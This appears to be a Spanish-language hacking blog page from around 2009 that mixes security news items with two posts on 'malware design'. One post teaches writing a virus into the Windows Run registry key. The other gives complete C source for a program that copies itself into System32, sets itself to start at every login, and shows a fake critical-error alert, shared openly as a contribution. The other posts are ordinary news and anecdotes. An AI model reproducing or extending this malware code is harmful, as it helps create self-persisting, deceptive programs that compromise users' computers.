Etiquetas: Hacking | Defacing | Bugs
Los ataques de inyección SQL aprovechan las deficiencias del análisis de la información devuelta de las peticiones de páginas web. Utilizando caracteres específicos es posible hacer que comandos SQL lleguen a las bases de datos que soportan un sitio web. Esta técnica es popular porque si un hacker consigue “interrogar” lo suficiente a la base de datos, puede llegar a extraer de ella información sensible, como los números de tarjetas de crédito de los clientes de la empresa tomada como víctima.
Por ejemplo, el pasado agosto los documentos presentados ante un tribunal estadounidense mostraron cómo los hackers habían conseguido por este sistema robar 130 millones de números de tarjetas de crédito y débito de Heartland Payment Systems aprovechando las vulnerabilidades que una adecuada prueba de penetración hubiera identificado.
En este contexto, Penetrator 7.0, SecPoint ayuda a identificar ataques con su motor de rastreo automático. El producto proporciona además 50 diccionarios de 50 idiomas para redes WPA2 y protege frente a los intentos de los hackers de aprovechar las redes wireless abiertas de las empresas.
Para los administradores TI que realizan su trabajo en movimiento, la compañía ofrece Portable Penetrator, que se suministra precargado sobre un laptop y proporciona análisis de vulnerabilidades y auditoría de seguridad Wi-Fi para redes con protocolos de seguridad WEP, WPA y WPA2.
Tanto Penetrator como Portable Penetrator pueden escanear múltiples localizaciones remotas proporcionando después informes centralizados.
Finalmente, la alternativa Online Penetrator permite a los clientes suscribirse al servidor cloud de SecPoint y escanear sus direcciones IP corporativas para la detección de vulnerabilidades en remoto.
Etiquetas: Noticias
El hijo le preguntó a su padre, 'Papá, formarias parte en el maratón conmigo? El padre respondió, si'
Fueron al maratón y lo completaron juntos. Padre e hijo fueron juntos a otros maratones, el padre siempre decía 'si' a las
solicitudes de su hijo de ir juntos en las carreras. Un día, el hijo le preguntó a su padre, ' Papá, vamos a participar juntos en el 'Ironman' ' El padre le dijo si tambien.
El triatlón Ironman abarca un 2,4 millas ( 3,86 kilómetros ) nadando en los océanos, seguida por una 112 millas (180,2 kilometros) paseo en bicicleta, y terminando con un 26,2 millas (42,195 kilometros) maratón a lo largo de la costa de Big Island.
Esto es digno de ver..
Saludos.
Etiquetas: Off-Topic
Así, 'Google' desconoce aún el motivo de los fallos, por lo que evitó ofrecer más explicaciones. Recomendó, no obstante, utilizar su aplicación 'Dashboaerd', que mantiene a los usuarios al corriente de sus diferentes aplicaciones, entre ellas, el correo electrónico.
No es la primera vez que el servicio de e-mail del gigante de las comunicaciones sufre problemas. El pasado 1 de septiembre el servicio también se 'cayó', algo que también ocurrió en febrero de este mismo año.
Etiquetas: Noticias
SPAM, correo o sms basura a los mensajes no solicitados, habitualmente de tipo publicitario, enviados en grandes cantidades que perjudican de alguna ¡manera al receptor, ahora más profesional que nunca.
El SPAM cada día está mejor diseñado, esta es la conclusión después del estudio realizado por Antispameurope sobre la evolución de los correos basuras en el mundo. El volumen de estos ha descendido, sin embargo el aspecto que tienen son cada vez mejores ofreciendo regalos, ayudas o consejos irresistibles. Es por ello que se puede decir que los cibercriminales se convierten en profesionales del Spam.
Al parecer los hacker se han dado cuenta que vale más la calidad que la cantidad, por esto mismo el volumen de envíos ha decrecido, pero los que existen son más complicados de detectar, al menos eso afirma un estudio realizado por Antispameurope.
El estudio afirma que a los hacker "no le interesa tanto enviar una gran cantidad de mensajes sin resultado alguno, si no enviar mensajes efectivos con los que puedan obtener resultados". Pro esto es necesario extremar las medidas para evitar dichos correos basuras.
Resaltar que en el último año cada usuario recibió una media de 12.500 correos de spam al mes. Una cantidad menos que los años anteriores, cuando estos no bajaban de los 38.500 al mes por usuario.
Etiquetas: Noticias
Primero que nada debo aclarar que no soy ningún experto en programación, y lo que aquí les mostrare es algo básico de lo que llamo POM (Programación Orientada a Malware), talvez cuando yo aprenda mas sobre (POM), pueda hacer un escrito que se entienda de cómo programar un engendro desde cero, pero por ahora tengo pocos conocimientos sobre ello, así que se aceptan críticas y cualquier error o sugerencia, me gustaría, me lo dijeran en el blog o me lo notificaran vía E-mail.
Cada vez que alguien intenta iniciarse en el mundo de la programación vírica, por muy programador profesional que sea, si no se tiene una noción minima de cómo funciona un virus, de seguro tendrá problemas, la idea de este escrito es que los mas iniciados sepan como manipular el registro de Windows e iniciar sus bichos en cada inicio del computador, desactivar funciones, modificar valores y otras cosas mas.
De antemano me permito aclarar que el código que aquí se presente será compilado sin problemas en Dev-C++ 4, pero que también debería compilarse sin problemas en CodeBlocks, entonces vallamos de lleno al tema.
Si hemos explorado alguna vez el registro de Windows habremos podido notar que de entrada el registro se divide en 5 ramas, las cuales son:
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
Cada una de las entradas anteriores cuenta con subcadenas, subclaves o rutinas de caracteres, estos mismos son los encargados de que Windows funcione tal como usted lo ve, pero por ahora no me pondré a explicar que significa cada uno de las entradas anteriores ya que no quiero que con este tema redacte mas de 10 hojas, mejor nos centraremos directamente en HKEY_LOCAL_MACHINE que es donde se encuentra la configuración mas importante de Windows y también donde se encuentran los programas que se inician automáticamente al arrancar Windows, que como es obvio por ahora es lo que nos interesa y para poder verlos solo basta abrir las subcarpetas o subcadena siguiente:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Como he dicho antes todo lo que se encuentre en esa cadena se iniciara automáticamente al arrancar Windows y es ahí donde también nosotros escribiremos.
Pero para poder escribir en el registro desde C++ debemos conocer antes que nada 4 funciones muy importantes para lograr nuestro objetivo.
HKEY hkey; esta función se declara para obtener la llave o cadena que queremos abrir.
RegCreateKey; Esta función nos permite escribir una ruta nueva en el registro de Windows y mas adelante veremos como funciona.
RegOpenKeyEx; Esta función API se declara para abrir el registro.
RegSetValueEx; Esta se declara para escribir en el registro algún valor.
RegCloseKey; Esta función como ya se pudieron haber dado cuenta sirve para cerrar el registro.
Pero como todos dicen lo mejor para entender esto es practicando, a continuación presentare un pequeño código en el que se podrá apreciar las funciones antes expuestas.
HKEY hKey; // Llamamos a HKEY
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey,"Nombre del virus",0,REG_SZ,(const unsigned char*)s,sizeof(Ruta donde esta nuestro virus));
RegCloseKey(hKey);
Es todo por el momento, espero sea útil.
Etiquetas: Análisis y diseño de malware
En el pais vecino, el ex agente de la PSA está acusado de violar los mails de políticos y entregar la información a servicios de inteligencia de terceros países. Por un mismo caso esta siendo investigado en Chile donde habría hackeado el correo electrónico del Ministro de Defensa de ese país.
Fuentes vinculadas a la investigación señalaron a Online-911 que además estaría demostrado que en las computadoras secuestradas del domicilio de Velásquez se encontraron gran de candidad de programas espías, que son utilizados para ingresar a las computadoras.
A pesar de que en varios medios de prensa Velásquez señaló que estaba dispuesto a declarar e incluso señaló que revelaría muchos secretos guardados de forma sorpresiva se negó a que la Justicia argentina lo interrogue.
En la causa que se lleva adelante en San Isidro también están imputados su compañero en la PSA Pablo Carpintero, el ex jefe de la SIDE, Juan Bautista "Tata" Yofre, el ex Secretario General del Ejército Daniel Reimundes y el titular del portal Seprin, Héctor Alderete. Además no se descarta que se investigue a otros polítcos y empresarios que habrían comprado los mails robados. Los correos también llegaron a periodistas como Roberto García, el desaparecido Bernardo Neustadt o Edgard Mainhard del portal Urgente 24.
La justicia los acusó de conformar una asociación ilícita con el objeto de robar información de los correos electrónicos entre otros de los ministros de Defensa, Nilda Garré, el Canciller Jorge Taiana, el ex jefe de Gabinete Alberto Fernández, el embajador Héctor Timerman y de los secretarios privados de la presidenta Cristina Fernández de Kirchner.
El 18 de agosto, en la causa, fue citado a declarar el ex jefe de Gabinete, Alberto Fernández luego que denunciara que estaba siendo espiado y sus mails violados. Ante la jueza señaló que no cree "que los organismos de inteligencia estatales esten detrás del hackeo de su cuenta de mail", pero agregó que "cualquier funcionario o privado puede contratar una empresa" que se dedica a este tipo de actividades.
El 12 de julio pasado la Sala Tercera de la Cámara de Casación determinó devolver el expediente al juzgado federal de San Isidro a cargo de Sandra Arroyo Salgado luego de más de un año donde la causa estuvo paralizada por un conflicto de competencia.
En Uruguay, la causa por espionaje está en manos de la jueza Mariana Mota; en tanto que la causa por la extradición esta en manos del juez Roberto Timbal.
Via: www.online-911.com
Etiquetas: Noticias
Este code lo que hace es tomar el path de System32 y se copia ahi se inicia a cada incio de sesion del sistema y como payload muestra un mensaje de alerta.
// http://whmd.blogspot.com
// http://ethical-security.co.cc
// http://bugdox.org
#include <windows.h>
#include
char windir[MAX_PATH];
int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);
HKEY hKey;
strcat(windir, "\\System32\\Alerta.exe");
CopyFile(pathname, windir, 0);
RegCreateKey (HKEY_CURRENT_USER, "Software\\z1z30f", &hKey);
RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE) windir, sizeof(windir));
MessageBox (0, "Error critico del sistema", "Fatal error...", MB_ICONERROR | MB_OK); // Mensjae critico
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE)windir, sizeof(windir));
return 0;
}
MessageBox (0, "alerta de ayuda", "Error", MB_ICONQUESTION | MB_OK); // Ayuda
MessageBox (0, "alerta de advertencia", "Error", MB_ICONEXCLAMATION | MB_OK); // Advertencia
Aqui una lista de estilos
MB_ABORTRETRYIGNORE
MB_APPLMODAL
MB_DEFAULT_DESKTOP_ONLY
MB_HELP
MB_ICONASTERISK
MB_ICONERROR
MB_ICONEXCLAMATION
MB_ICONHAND
MB_ICONINFORMATION
MB_TASKMODAL
Como pueden ver no es gran cosa, pues ahi lo dejo como aporte.
Saludos.
Etiquetas: Análisis y diseño de malware
La empresa de seguridad online Panda detectó un dominio en donde ofrecen poner al descubierto las identidades en FaceBook, y que se puede ingresar a la mayoría de las cuentas de cualquier usuario, ya sea de algún artista, político o marca publicitaria.
El mencionado portal destaca que se aprovechan de los agujeros de seguridad de FaceBook para ingresar al 99 por ciento de las cuentas.
Los hackers proporcionan por cien dólares el nombre de un usuario con su contraseña para ingresar a la mayoría de las cuentas.
Para solicitar el servicio, primero se tiene que realizar un pago online a través de Western Union. El país receptor se ubica en Ucrania, pero el dominio está registrado en Moscú.
De acuerdo con la información que proporciona la página, tienen experiencia de cuatro años; sin embargo sólo tiene unos días según Panda.
Cuando se tienen el acceso a las cuentas, se pueden enviar a la red VIRUS, SPAM o incluso distribuir información falsa en nombre del personaje al que se suplanta.
Etiquetas: Noticias
Expertos en seguridad informatica y hackers afirman que el último sistema operativo de Apple, Mac OS X 10.6, Snow Leopard, es menos seguro que el proximo Windows 7.
Los expertos de seguridad han criticado que el sistema operativo trae desactivado de serie el cortafuegos además de no tener la posibilidad de recibir actualizaciones automáticas y también unos esfuerzos muy débiles antiphising en Safari, y que Apple lanzó al mismo con una versión de Adobe Flash vulnerable a ataques, aunque ya lo han solucionado en la primera actualización del mismo.
Un importante hacker de Mac ha hecho notar la diferencias en seguridad, confirmando que Apple no ha mejorado nada, y ha afirmado que ello hace Snow Leopard más inseguro que el venidero Windows 7.
Etiquetas: Noticias